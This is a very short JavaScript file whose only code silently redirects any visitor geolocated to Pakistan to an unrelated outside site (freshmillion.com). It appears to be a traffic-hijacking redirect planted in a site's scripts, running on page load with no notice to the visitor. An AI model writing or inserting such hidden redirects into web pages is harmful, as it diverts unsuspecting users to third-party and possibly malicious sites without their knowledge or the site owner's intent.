// JavaScript Document
if (geoip_country_code() == 'PK') {
	window.location.href = 'http://freshmillion.com/?hd';
}	
